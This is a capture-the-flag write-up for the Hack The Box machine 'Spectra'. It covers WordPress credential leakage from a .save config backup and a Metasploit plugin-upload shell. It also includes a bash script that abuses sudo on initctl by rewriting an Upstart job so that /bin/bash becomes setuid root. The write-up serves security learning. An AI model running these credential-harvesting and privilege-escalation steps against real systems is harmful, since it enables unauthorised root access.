Spectra Hack The Box

Spectra Write Up – Hack The Box

Enumeration

The first step for this box is the usual one: an nmap scan to see which ports are open and which services are listening on them.

nmap scan results

As you can see, several ports are open. I generally start recon from port 80, since it means some kind of web page is being served. From previous boxes I know to add spectra.htb to my /etc/hosts file first. At first glance the page does not give away much: there are two links, and since the rule is "click all links", I did exactly that.

I also ran dirbuster in the background, because one of the linked pages looked like a WordPress blog.

Dirbuster showed that the /testing directory has directory listing enabled, and there are interesting files in it to look at.

As you can see from the picture above, one of the files looks really interesting because of its .save extension. Opening it in the browser gave me a blank page, which was odd, so I looked at the page source. And behold, there is code and useful information in there. The blank page makes sense once you see the source: the file starts with a PHP tag, which the browser treats as markup and does not render, but the bytes are still delivered, so view-source (or a plain curl of the URL) shows everything. I will not put up a screenshot, because it would be good for the reader (YOU) to take a look and find the useful information yourself. It sucks, I know, but that is how you learn.

After finding the password I still needed a username. Luckily, as I mentioned, this is a WordPress site, so a username can be found from whoever has published posts on the blog.

There is also a "log in" link that you need to follow. So now I have a username and a password. Let's log in and see what's going on.
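The two enumeration steps above (pulling credentials out of the .save file's raw source, and harvesting a username from the author links on WordPress posts) can be scripted. The following is an added example and not code from the original write-up; it assumes the .save file is a PHP configuration backup (such as WordPress's wp-config.php) that keeps credentials in define() calls, and that posts link their authors as /author/<slug>/, which is WordPress's default. Both inputs are constructed samples, not data from the box.

```bash
#!/usr/bin/env bash
# Added example for the enumeration step; not code from the original write-up.
# Assumptions: the .save file under /testing is a PHP configuration backup (such
# as WordPress's wp-config.php) that stores credentials in define() calls, and
# the blog's post pages link authors as /author/<slug>/ (WordPress's default).
# Both inputs below are constructed samples, not data from the box.
set -u

# Why the browser showed a blank page: the file starts with '<?php', which the
# browser parses as the beginning of a tag, so nothing is rendered. The bytes
# still arrive, which is why view-source (or curl) exposes them. Against a live
# target you would fetch it with:   curl -s http://spectra.htb/testing/<file>.save
SAMPLE_SAVE=$(cat <<'EOF'
<?php
/** Constructed sample, modelled on a WordPress config backup. */
define( 'DB_NAME', 'example_db' );
define( 'DB_USER', 'example_user' );
define( 'DB_PASSWORD', 'Constructed-Passw0rd' );
define( "DB_HOST", "localhost" );
$table_prefix = 'wp_';
EOF
)

# Constructed fragment of a WordPress post page; the author link carries the slug.
SAMPLE_POST_HTML=$(cat <<'EOF'
<span class="author vcard"><a class="url fn n" href="http://spectra.htb/author/administrator/">administrator</a></span>
<a href="http://spectra.htb/author/administrator/">More posts</a>
EOF
)

# Print NAME=VALUE for every define('NAME', 'VALUE') in the text on stdin.
# Handles single or double quotes and WordPress's spacing inside the parentheses.
extract_defines() {
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]\([^'\"]*\)['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"][[:space:]]*).*/\1=\2/p"
}

# Value of one define() from the sample, e.g.:  config_value DB_PASSWORD
config_value() {
    printf '%s\n' "$SAMPLE_SAVE" | extract_defines | sed -n "s/^$1=//p"
}

# Unique author slugs from WordPress post HTML on stdin. The slug is derived
# from the login name by default, so it is usually what the login form wants.
wp_authors() {
    grep -o 'author/[^/"]*/' | sed 's#^author/##; s#/$##' | sort -u
}

# The write-up's two steps, in order:
printf '%s\n' "$SAMPLE_POST_HTML" | wp_authors   # -> administrator
config_value DB_PASSWORD                          # -> Constructed-Passw0rd
```

Against the real box, replace the two sample variables with the output of curl for the .save file and for a post page; the parsing stays the same.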

Foothold:

After logging in I looked around for more useful information. Nothing of value turned up until I decided to check which version of WordPress was running. Some googling showed that a Metasploit module can be used here: exploit/unix/webapp/wp_admin_shell_upload. Note that this module is not an unauthenticated exploit; it logs in with valid credentials for an account allowed to install plugins and uploads a malicious plugin, which is why the credentials found during enumeration matter.

You can check the module options (RHOSTS, TARGETURI, USERNAME, PASSWORD and your LHOST) and do the setup yourself. If you run into issues, leave a comment and I will try to help. After execution we have a meterpreter shell, which is awesome.

USER:

I spent some time looking around and found something interesting: a file in /opt. Examining it led me to another file that was supposed to hold a password, and it DID. So now we have a username, "katie", and a password. Switching users with su from the meterpreter shell didn't work, so I tried SSH with these credentials and ... it worked. Now you can grab the USER FLAG.

If you get stuck, you can join our Discord server. Even if you are not stuck, join and let's learn new things together.

Root:

Getting root was not that hard. I checked what I can run with sudo as the current user, which you do with "sudo -l". It shows that "katie" can execute "/sbin/initctl" as root. initctl is the control tool for the Upstart init daemon; it starts and stops the jobs defined in /etc/init/*.conf. If you want to know more about what it does, read here.

We can use initctl to control jobs: start and stop them, which is what lets us escalate privileges on this box. If we run ls -l in the /etc/init folder we see many files, but the ones named test***.conf are interesting. Check who owns them and who is allowed to write to them: a job file that our user can edit but that root executes is the whole bug. I focused on test.conf; have a look at what is inside. The idea is to replace its contents with our own job definition so that, when the job is started as root, it runs our commands, for example making /bin/bash setuid root so that "katie" can run it with root permissions.

To do the above I found an interesting article (linked below); follow its instructions and you will reach the root flag. There is a cron job that runs the test job every 10 seconds; you can also trigger it yourself with "sudo /sbin/initctl start test" (stop it first with "sudo /sbin/initctl stop test" if it is already running, since Upstart will not start a job that is running). Remember to restore the original test.conf and remove the setuid bit from /bin/bash once you have the flag.

https://isharaabeythissa.medium.com/sudo-privileges-at-initctl-privileges-escalation-technique-ishara-abeythissa-c9d44ccadcb9
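The whole root step, from overwriting the job file to starting it through sudo, as an added example. This is not code from the original write-up or from the linked article. It assumes Upstart is the init system, that /etc/init/test.conf is writable by the current user, and that sudo allows /sbin/initctl (as "sudo -l" showed for katie); the payload, job name and backup path are choices made here for illustration.

```bash
#!/usr/bin/env bash
# Added example for the initctl privilege escalation described above. It is not
# code from the original write-up or the linked article. Assumptions: Upstart is
# the init system, the job file /etc/init/test.conf is writable by the current
# user, and 'sudo /sbin/initctl' is allowed (as 'sudo -l' showed for katie).
set -u

JOB_NAME="test"
JOB_FILE="/etc/init/${JOB_NAME}.conf"

# Print an Upstart job whose script block runs as root when the job starts.
# It has no 'start on' stanza, so it only runs when started explicitly, and it
# marks /bin/bash setuid root so the unprivileged user can spawn it with -p.
upstart_job_body() {
    cat <<'EOF'
description "test job (added example: setuid shell dropper)"
script
    chmod u+s /bin/bash
end script
EOF
}

# Replace the job file; a copy of the original is kept so it can be restored.
# Takes an optional path so the function can be exercised on a scratch file.
write_job() {
    target="${1:-$JOB_FILE}"
    if [ -f "$target" ]; then
        cp "$target" "${target}.bak"
    fi
    upstart_job_body > "$target"
}

# Check helper: does a job file carry a script stanza with our payload?
job_is_armed() {
    grep -q '^script$' "$1" && grep -q 'chmod u+s /bin/bash' "$1" && grep -q '^end script$' "$1"
}

# Start the job via sudo so root runs the script block, then use the setuid
# bash. Stop first in case the job is already running: Upstart refuses to
# start a job that is running, so the edited file would never be executed.
trigger_job() {
    sudo /sbin/initctl stop "$JOB_NAME" 2>/dev/null || true
    sudo /sbin/initctl start "$JOB_NAME"
    # -p keeps the effective uid; without it bash drops the setuid privilege.
    /bin/bash -p
}

# Put the box back: restore the original job file and clear the setuid bit.
cleanup() {
    if [ -f "${JOB_FILE}.bak" ]; then
        mv "${JOB_FILE}.bak" "$JOB_FILE"
    fi
    sudo chmod u-s /bin/bash
}

# Only touch the real system when asked to:  ./initctl_privesc.sh --run
if [ "${1:-}" = "--run" ]; then
    write_job && job_is_armed "$JOB_FILE" && trigger_job
fi
```

The important property is that initctl, not the user, executes the script block: the only privilege katie has is starting and stopping jobs, and the writable job file turns that into arbitrary commands as root. On a shared lab box, run cleanup afterwards so the next player finds the machine as intended.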

Conclusion

Thank you for reading the write-up. If you get stuck somewhere, please leave a comment and I will try to point you in the right direction.